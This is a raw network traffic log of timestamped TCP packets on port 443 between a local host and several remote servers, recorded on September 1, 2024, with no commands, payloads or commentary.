Sep 1, 2024 00:54:41.451479912 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.451948881 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.452395916 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.452419996 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.452486038 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.452558041 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.453479052 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.453515053 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.453536034 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.453628063 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.453691959 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.454121113 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.454128981 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.454276085 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.454283953 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.454514980 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.454588890 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.454648018 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.456015110 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.456079006 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.456995010 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.457170010 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.457918882 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.458565950 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.458575010 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.458926916 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.458937883 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.460033894 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.460131884 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.460401058 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.460503101 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.460588932 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.460594893 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.470927000 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.470979929 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.471041918 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.471870899 CEST	49748	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.471888065 CEST	443	49748	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.481940031 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.481975079 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.482085943 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.482301950 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.482317924 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.496500969 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.499764919 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.499777079 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.501434088 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.516793013 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.516805887 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.516807079 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.516809940 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.545830965 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.559223890 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.559298038 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.564148903 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.564241886 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.564451933 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.565090895 CEST	49746	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.565115929 CEST	443	49746	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.566152096 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.566226006 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.568294048 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.570383072 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.570483923 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.570528984 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.570545912 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.570569992 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.578607082 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.578633070 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.578646898 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.578670979 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.578721046 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.578730106 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.578756094 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.579013109 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.582142115 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.635510921 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.635550976 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.635659933 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.636588097 CEST	49750	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.636607885 CEST	443	49750	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.637409925 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.637424946 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.637763023 CEST	49749	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.637768984 CEST	443	49749	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.638547897 CEST	49751	443	192.168.2.6	13.107.246.73
Sep 1, 2024 00:54:41.638571024 CEST	443	49751	13.107.246.73	192.168.2.6
Sep 1, 2024 00:54:41.643827915 CEST	49747	443	192.168.2.6	13.107.246.44
Sep 1, 2024 00:54:41.643846035 CEST	443	49747	13.107.246.44	192.168.2.6
Sep 1, 2024 00:54:41.717570066 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.717617035 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.717669964 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.717819929 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.717849016 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.717914104 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718185902 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718198061 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.718245029 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718543053 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718554974 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.718683004 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718699932 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.718807936 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:41.718817949 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:41.929302931 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.951845884 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.951862097 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.952855110 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.952936888 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.953466892 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.953524113 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.953732014 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.953738928 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.996720076 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.997111082 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.997140884 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.998224020 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.998279095 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.998667002 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.999243021 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.999308109 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:41.999651909 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:41.999660015 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.045551062 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.049356937 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.049483061 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.049705982 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.051964045 CEST	49752	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.051990986 CEST	443	49752	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.102444887 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.102540970 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.102587938 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.102600098 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.102613926 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.102663040 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.105709076 CEST	49753	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.105720997 CEST	443	49753	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.115670919 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.115915060 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.115925074 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.117069006 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.117130995 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.117666006 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.117728949 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.117791891 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.164509058 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.167777061 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.167784929 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.215965033 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.216037989 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.218667984 CEST	49754	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.218683004 CEST	443	49754	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.296644926 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.351777077 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.351788044 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.352222919 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.353044987 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.353060007 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.353118896 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.355897903 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.366415024 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.366446018 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.366779089 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.366847992 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.366978884 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.367001057 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.367378950 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.367387056 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.367541075 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.367603064 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368093967 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.368125916 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368144989 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368189096 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.368597984 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368663073 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.368702888 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368710041 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.368809938 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.368815899 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.392880917 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.417915106 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.417927027 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.417927980 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.432770967 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.432782888 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.433978081 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.434046984 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.465346098 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.465423107 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.465504885 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.465784073 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.465843916 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.465894938 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.468563080 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.468625069 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.468660116 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.475564957 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.475666046 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.476809025 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.476818085 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.508718014 CEST	49756	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.508752108 CEST	443	49756	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.509232998 CEST	49758	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.509258986 CEST	443	49758	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.509589911 CEST	49755	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:42.509607077 CEST	443	49755	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:42.527295113 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.578958988 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.579130888 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.579185963 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:42.579243898 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.579296112 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.837820053 CEST	49757	443	192.168.2.6	13.107.246.42
Sep 1, 2024 00:54:42.837856054 CEST	443	49757	13.107.246.42	192.168.2.6
Sep 1, 2024 00:54:44.348706961 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:44.348774910 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:44.348833084 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:44.840867043 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:44.840893030 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:51.742155075 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:51.742189884 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:51.742312908 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:51.742865086 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:51.742877960 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.543263912 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.543757915 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.557415009 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.557432890 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.557708025 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.588152885 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.588413000 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.588418007 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.589184999 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.632503986 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.767025948 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.767144918 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:52.767426968 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.768002987 CEST	49767	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:52.768016100 CEST	443	49767	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:56.097594023 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.097631931 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.097809076 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.098628998 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.098643064 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.104144096 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.104165077 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.104223967 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.104899883 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.104911089 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.777389050 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.777935028 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.777970076 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.779086113 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.779149055 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.783679008 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.783790112 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.784384966 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.784393072 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.825407982 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.920398951 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.920893908 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.920906067 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.922143936 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.922249079 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.924468040 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.924551010 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:56.932131052 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932145119 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932157040 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932188988 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932226896 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.932231903 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932249069 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:56.932265997 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.932300091 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:56.968775034 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:56.968786001 CEST	443	49773	152.199.21.175	192.168.2.6
Sep 1, 2024 00:54:57.015798092 CEST	49773	443	192.168.2.6	152.199.21.175
Sep 1, 2024 00:54:57.024194956 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.024225950 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.024271011 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.024292946 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.024321079 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.024344921 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.026401997 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.026426077 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.026465893 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.026473045 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.026505947 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.026529074 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.115061998 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.115087986 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.115140915 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.115165949 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.115216017 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.115242004 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.115988016 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.116004944 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.116071939 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.116079092 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.116122961 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.117738962 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.117757082 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.117824078 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.117831945 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.117871046 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.118712902 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.118729115 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.118799925 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.118805885 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.118845940 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.207472086 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.207501888 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.207566023 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.207591057 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.207617044 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.207638979 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.208008051 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.208024979 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.208065987 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.208072901 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.208106995 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.208281040 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.209422112 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.209436893 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.209487915 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.209495068 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.209578037 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.210303068 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.210318089 CEST	443	49772	13.107.246.60	192.168.2.6
Sep 1, 2024 00:54:57.210376978 CEST	49772	443	192.168.2.6	13.107.246.60
Sep 1, 2024 00:54:57.210382938 CEST	443	49772	13.107.246.60	192.168.2.6
